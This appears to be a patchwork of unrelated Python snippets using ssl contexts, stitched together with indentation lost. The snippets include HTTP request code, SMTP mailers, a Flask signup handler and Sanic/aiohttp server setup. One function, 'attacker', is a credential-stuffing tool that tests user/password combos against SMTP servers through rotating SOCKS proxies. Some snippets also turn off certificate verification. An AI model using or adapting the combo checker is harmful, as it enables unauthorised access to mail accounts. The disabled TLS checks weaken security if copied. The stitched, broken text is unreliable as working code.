ctx.verify_mode = ssl.CERT_NONE
args['context'] = ctx
if self._proxy_host:
Logger.debug('UrlRequest: {0} - proxy via {1}:{2}'.format(
id(self), self._proxy_host, self._proxy_port
))
req = cls(self._proxy_host, self._proxy_port, **args)
if parse.scheme == 'https':
req.set_tunnel(host, port, self._proxy_headers)
else:
path = urlunparse(parse)
else:
req = cls(host, port, **args)
# send request
method = self._method
if method is None:
method = 'GET' if body is None else 'POST'
req.request(method, path, body, headers or {})
# read header
resp = req.getresponse()
# read content
if report_progress or file_path is not None:
try:
total_size = int(resp.getheader('content-length'))
except:
total_size = -1
# before starting the download, send a fake progress to permit the
# user to initialize his ui
if report_progress:
q(('progress', resp, (0, total_size)))
def get_chunks(fd=None):
bytes_so_far = 0
result = b''
while 1:
chunk = resp.read(chunk_size)
if not chunk:
break
if fd:
fd.write(chunk)
else:
result += chunk
bytes_so_far += len(chunk)
# report progress to user
if report_progress:
q(('progress', resp, (bytes_so_far, total_size)))
trigger()
if self._cancel_event.is_set():
break
return bytes_so_far, result
if file_path is not None:
with open(file_path, 'wb') as fd:
bytes_so_far, result = get_chunks(fd)
else:
bytes_so_far, result = get_chunks()
# ensure that results are dispatched for the last chunk,
# avoid trigger
if report_progress:
q(('progress', resp, (bytes_so_far, total_size)))
trigger()
else:
result = resp.read()
try:
if isinstance(result, bytes):
result = result.decode('utf-8')
except UnicodeDecodeError:
# if it's an image? decoding would not work
pass
req.close()
# return everything
return result, resp
def client_ssl_ctx(tls_certificate_authority: Any) -> ssl.SSLContext:
ssl_ctx = ssl.create_default_context(purpose=ssl.Purpose.SERVER_AUTH)
tls_certificate_authority.configure_trust(ssl_ctx)
return ssl_ctx
import ssl
import smtplib
import constants
import helpers
secureContext = ssl.create_default_context()
# o with statement garante que a conexao sera encerrada apos o fim da execucao de seu bloco
with smtplib.SMTP_SSL(constants.serverURL,
constants.portNum,
context=secureContext) as server:
server.login(constants.userEmail, constants.userPassword)
newEmail = helpers.createNewEmail()
mailComponents = helpers.generateMailComponents()
newEmail = helpers.addPartsToMessage(mailComponents, newEmail)
newEmail = helpers.attachFileToMessage(constants.fileName, newEmail)
response = server.sendmail(constants.userEmail, constants.targetEmail,
newEmail.as_string())
print(response)
def post(self):
# username is user's email address
username = request.form.get("username")
password = request.form.get("password")
def valid_username(username):
pattern = "[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!$%&'*+/=?^_`{|}~-]+)*@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?"
if re.match(pattern, username):
return True
return False
if not valid_username(username):
message = "Please enter a valid email address as your username."
flash(message, 'error')
return redirect(url_for('userregister'))
if len(username) > 80:
message = "Username too long."
flash(message, 'error')
return redirect(url_for('userregister'))
if len(password) == 0:
message = "Please enter a password."
flash(message, 'error')
return redirect(url_for('userregister'))
user = UserModel.find_by_username(username)
if user:
message = "Email address already exists"
flash(message, 'error')
return redirect(url_for('userregister'))
hashed_password = generate_password_hash(password,
method='pbkdf2:sha256',
salt_length=32)
api_key = str(b64encode(urandom(64)).decode('latin1'))[0:64]
all_blacklist = [
blacklist.api_key for blacklist in BlacklistModel.find_all()
]
while UserModel.find_by_key(api_key) or api_key in all_blacklist:
api_key = str(b64encode(urandom(64)).decode('latin1'))[0:64]
username = str(utils.escape(username))
new_user = UserModel(username, hashed_password, api_key)
# send email
subject = "A new user has signed up!"
email = username
email = str(utils.escape(email))
smtp_server = current_app.config['MAIL_SERVER']
port = current_app.config['MAIL_PORT']
sender_email = current_app.config['MAIL_DEFAULT_SENDER']
mail_username = current_app.config['MAIL_USERNAME']
receiver_email = current_app.config['MAIL_DEFAULT_SENDER']
password = current_app.config['MAIL_PASSWORD']
msg = MIMEMultipart("alternative")
msg["Subject"] = subject
msg["From"] = sender_email
msg["To"] = receiver_email
text = "A new user has registered. (" + email + ")"
html = "<h2>A new user has registered.</h2><p><h3>(" + email + ")</h3>"
part1 = MIMEText(text, "plain")
part2 = MIMEText(html, "html")
msg.attach(part1)
msg.attach(part2)
context = ssl.create_default_context()
with smtplib.SMTP(smtp_server, port=port,
local_hostname="127.0.0.1") as server:
try:
server.starttls(context=context)
server.login(mail_username, password)
server.send_message(msg, sender_email, receiver_email)
except:
pass
try:
new_user.save_to_db()
message = "Registered successfully. Please log in."
flash(message, 'info')
except:
message = "Something went wrong. Please try again later."
flash(message, 'error')
return redirect(url_for('userregister'))
return redirect(url_for('userlogin'))
def send_mail(username, password, from_addr, to_addrs, msg):
context = ssl.create_default_context()
with smtplib.SMTP_SSL("smtp.gmail.com", port, context=context) as server:
server.login(username, password)
server.sendmail(from_addr, to_addrs, msg.as_string())
import asyncio
import os
import ssl
from asyncio import Future
from concurrent.futures.process import ProcessPoolExecutor
from contextlib import suppress
from typing import List, Callable, Dict, Union, Any, Awaitable
import aiohttp
from aiohttp import ClientConnectorError, ServerTimeoutError
from aiologger import Logger
from lxml import html
from user_agent import generate_navigator
SSLCONTEXT = ssl.create_default_context(cafile='/home/powersemmi/PycharmProjects/aioparse/aioparse/crawlera-ca.crt')
class AIOParse:
"""
AIOParser is a async universal parser
"""
def __init__(self, root_urls: List[str], parse_funcs: Dict[str, Callable]) -> None:
"""
:param root_urls: urls for root parsing
:param parse_funcs: funcs for parse and parse in depth, one by one
"""
self.event_loop = asyncio.get_event_loop()
self.root_urls: List[str] = root_urls
self.parse_funcs: Dict[str, Callable] = parse_funcs
def attacker(attackhost, attackport, attackuser, attackpass):
socket.setdefaulttimeout(tout)
attackcontext = ssl.create_default_context()
if usesocks == 1:
rawproxy = str(randomprox())
fproxy = str(rawproxy.split(":")[0])
fproxyport = int(rawproxy.split(":")[1])
socks.set_default_proxy(socks.PROXY_TYPE_SOCKS5, fproxy, fproxyport)
socks.wrapmodule(smtplib)
else:
pass
try:
#if SMTP port is unknown, try to find it using most common ones:
if attackport == 0:
print(Fore.LIGHTYELLOW_EX + 'Unknown port for HOST ' +
str(attackhost) +
', testing connection with most common ports ...\n')
for x in subp:
p = int(x)
try:
attack = smtplib.SMTP_SSL(str(attackhost),
int(p),
context=attackcontext)
attack.quit()
print(Fore.LIGHTGREEN_EX + Style.BRIGHT +
'PORT for connection found: ' + str(p) + ' ...\n')
attackport = int(p)
break
except:
try:
attack = smtplib.SMTP(str(attackhost), int(p))
attack.quit()
print(Fore.LIGHTGREEN_EX + Style.BRIGHT +
'PORT for connection found: ' + str(p) +
' ...\n')
attackport = int(p)
break
except:
print(Fore.LIGHTRED_EX + Style.BRIGHT +
'(!) Connection error (!) for HOST: ' +
str(attackhost) + ' on PORT: ' + str(p) +
' ...\n')
try:
attack.quit()
except:
pass
continue
else:
print(Fore.LIGHTMAGENTA_EX + 'Starting attack on: ' +
str(attackhost) + ':' + str(attackport) + ', USER: '******', PASS: '******' ...\n')
#if SMTP port is known, start checking combo against host:
try:
print(Fore.LIGHTMAGENTA_EX + 'Connecting to HOST ' +
str(attackhost) + ':' + str(attackport) + ' with SSL ...\n')
attack = smtplib.SMTP_SSL(str(attackhost),
int(attackport),
context=attackcontext)
print(Fore.LIGHTMAGENTA_EX + 'Checking login-data, HOST: ' +
str(attackhost) + ':' + str(attackport) + ', USER: '******', PASS: '******' ...\n')
except:
try:
print(Fore.LIGHTMAGENTA_EX + 'Connecting to HOST ' +
str(attackhost) + ':' + str(attackport) +
' without SSL ...\n')
attack = smtplib.SMTP(str(attackhost), int(attackport))
try:
print(Fore.LIGHTMAGENTA_EX +
'Trying to start TLS for HOST: ' + str(attackhost) +
' ...\n')
attack.starttls(context=attackcontext)
except:
pass
print(Fore.LIGHTMAGENTA_EX + 'Checking login-data, HOST: ' +
str(attackhost) + ':' + str(attackport) + ', USER: '******', PASS: '******' ...\n')
except:
pass
attack.login(str(attackuser), str(attackpass))
attack.quit()
#return result to checking process:
if usesocks == 1:
return True, str(attackhost), int(attackport), str(
attackuser), str(attackpass), str(fproxy), int(fproxyport)
else:
return True, str(attackhost), int(attackport), str(
attackuser), str(attackpass)
except:
try:
attack.quit()
except:
pass
print(Fore.LIGHTRED_EX + Style.BRIGHT +
'(!) Connection or login error (!) for HOST: ' +
str(attackhost) + ' on PORT: ' + str(attackport) + ' ...\n')
if usesocks == 1:
return False, str(attackhost), int(attackport), str(
attackuser), str(attackpass), str(fproxy), int(fproxyport)
else:
return False, str(attackhost), int(attackport), str(
attackuser), str(attackpass)
def _ssl_context(verify=True):
ssl_context = ssl.create_default_context(cafile=certifi.where())
if not verify:
ssl_context.check_hostname = False
ssl_context.verify_mode = ssl.CERT_NONE
return ssl_context
def _get_ssl_context():
import certifi
import ssl
return ssl.create_default_context(cafile=certifi.where())
def _helper(
self,
host=None,
port=None,
debug=False,
ssl=None,
sock=None,
workers=1,
loop=None,
protocol=HttpProtocol,
backlog=100,
stop_event=None,
register_sys_signals=True,
run_async=False,
auto_reload=False,
):
"""Helper function used by `run` and `create_server`."""
if isinstance(ssl, dict):
# try common aliaseses
cert = ssl.get("cert") or ssl.get("certificate")
key = ssl.get("key") or ssl.get("keyfile")
if cert is None or key is None:
raise ValueError("SSLContext or certificate and key required.")
context = create_default_context(purpose=Purpose.CLIENT_AUTH)
context.load_cert_chain(cert, keyfile=key)
ssl = context
if stop_event is not None:
if debug:
warnings.simplefilter("default")
warnings.warn(
"stop_event will be removed from future versions.",
DeprecationWarning,
)
self.error_handler.debug = debug
self.debug = debug
server_settings = {
"protocol": protocol,
"request_class": self.request_class,
"is_request_stream": self.is_request_stream,
"router": self.router,
"host": host,
"port": port,
"sock": sock,
"ssl": ssl,
"signal": Signal(),
"debug": debug,
"request_handler": self.handle_request,
"error_handler": self.error_handler,
"request_timeout": self.config.REQUEST_TIMEOUT,
"response_timeout": self.config.RESPONSE_TIMEOUT,
"keep_alive_timeout": self.config.KEEP_ALIVE_TIMEOUT,
"request_max_size": self.config.REQUEST_MAX_SIZE,
"request_buffer_queue_size": self.config.REQUEST_BUFFER_QUEUE_SIZE,
"keep_alive": self.config.KEEP_ALIVE,
"loop": loop,
"register_sys_signals": register_sys_signals,
"backlog": backlog,
"access_log": self.config.ACCESS_LOG,
"websocket_max_size": self.config.WEBSOCKET_MAX_SIZE,
"websocket_max_queue": self.config.WEBSOCKET_MAX_QUEUE,
"websocket_read_limit": self.config.WEBSOCKET_READ_LIMIT,
"websocket_write_limit": self.config.WEBSOCKET_WRITE_LIMIT,
"graceful_shutdown_timeout": self.config.GRACEFUL_SHUTDOWN_TIMEOUT,
}
# -------------------------------------------- #
# Register start/stop events
# -------------------------------------------- #
for event_name, settings_name, reverse in (
("before_server_start", "before_start", False),
("after_server_start", "after_start", False),
("before_server_stop", "before_stop", True),
("after_server_stop", "after_stop", True),
):
listeners = self.listeners[event_name].copy()
if reverse:
listeners.reverse()
# Prepend sanic to the arguments when listeners are triggered
listeners = [partial(listener, self) for listener in listeners]
server_settings[settings_name] = listeners
if self.configure_logging and debug:
logger.setLevel(logging.DEBUG)
if (self.config.LOGO
and os.environ.get("SANIC_SERVER_RUNNING") != "true"):
logger.debug(self.config.LOGO if isinstance(self.config.LOGO, str
) else BASE_LOGO)
if run_async:
server_settings["run_async"] = True
# Serve
if host and port and os.environ.get("SANIC_SERVER_RUNNING") != "true":
proto = "http"
if ssl is not None:
proto = "https"
logger.info("Goin' Fast @ {}://{}:{}".format(proto, host, port))
return server_settings
def _OpenStream(self, url, max_retries=5, status_codes=None):
"""Opens a connection to a remote resource.
Args:
url: The address of the file to be downloaded.
max_retries: The number of times to attempt to download a file if the
first attempt fails. A negative number implies infinite.
status_codes: A list of acceptable status codes to be returned by the
remote endpoint.
Returns:
file_stream: urlopen's file stream
Raises:
DownloadError: The resource was unreachable or failed to return with the
expected code.
"""
attempt = 0
file_stream = None
opener = urllib.request.OpenerDirector()
for handler in self._GetHandlers():
opener.add_handler(handler)
urllib.request.install_opener(opener)
url = url.strip()
parsed = urllib.parse.urlparse(url)
if not parsed.netloc:
raise DownloadError('Invalid remote server URL "%s".' % url)
while True:
try:
attempt += 1
if FLAGS.environment == 'WinPE':
file_stream = urllib.request.urlopen(
url, cafile=self._ca_cert_file)
else:
file_stream = urllib.request.urlopen(url)
except urllib.error.HTTPError:
logging.error('File not found on remote server: %s.', url)
except urllib.error.URLError as e:
logging.error(
'Error connecting to remote server to download file '
'"%s". The error was: %s', url, e)
try:
logging.info('Trying again with machine context...')
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
file_stream = urllib.request.urlopen(url, context=ctx)
except urllib.error.HTTPError:
logging.error('File not found on remote server: %s.', url)
except urllib.error.URLError as e:
logging.error(
'Error connecting to remote server to download file '
'"%s". The error was: %s', url, e)
if file_stream:
if file_stream.getcode() in (status_codes or [200]):
return file_stream
elif file_stream.getcode() in [302]:
url = file_stream.geturl()
else:
raise DownloadError(
'Invalid return code for file %s. [%d]' %
(url, file_stream.getcode()))
if max_retries < 0 or attempt < max_retries:
logging.info(
'Sleeping for 20 seconds and then retrying the download.')
time.sleep(20)
else:
raise DownloadError('Permanent failure for resource %s.' % url)
APIApp.add_subapp("/v0/", APIv0App)
APIApp.add_subapp("/oauth2/", OAuth2App)
app.add_subapp("/api/", APIApp)
# logging setup
setup_logging(app)
# SSL setup
ssl_context: Optional[ssl.SSLContext] = None
if app["args"].force_ssl:
server_log.info("SSL: Using certificate")
ssl_context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
ssl_section = app["config"]["ssl"]
ssl_context.load_cert_chain(ssl_section["cert-chain-path"],
ssl_section["cert-privkey-path"])
server_log.info(
f'Running in {"debug" if app["args"].debug else "production"} mode')
# debug setup
if app["args"].debug:
from routes.debug import routes as debug_routes
from routes.debug import shutdown as debug_shutdown
Debugapp = web.Application()
Debugapp.add_routes(debug_routes)
